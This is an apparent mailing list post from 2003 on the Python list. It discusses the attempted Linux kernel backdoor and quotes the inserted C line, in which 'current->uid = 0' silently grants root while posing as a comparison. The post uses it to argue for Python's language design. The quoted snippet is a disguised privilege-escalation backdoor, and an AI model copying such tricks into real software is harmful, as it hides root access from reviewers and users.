Linux security: mixing assignment with expression
Dave Benjamin
ramen at lackingtalent.com
Wed Nov 12 15:27:14 EST 2003
Hey folks,
I was just reading about the attempt to insert a backdoor into the Linux
kernel. You can read the details here:
http://kerneltrap.org/node/view/1584
This is the code that the attacker inserted:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
Notice the "current->uid = 0" expression? I think it's pretty clear that the
intent was to confuse the reader, to make the above code appear like it's
doing a comparison, when actually it is assigning 0 to the user ID (0 being
the root user).
In this case, the ability to mix assignment with expression in C not only
affected readability but--as a result--security. I think this clearly lends
credibility to Guido's design decision to deliberately prevent this sort of
"mistake".
--
.:[ dave benjamin (ramenboy) -:- www.ramenfest.com -:- www.3dex.com ]:.
: d r i n k i n g l i f e o u t o f t h e c o n t a i n e r :
More information about the Python-list
mailing list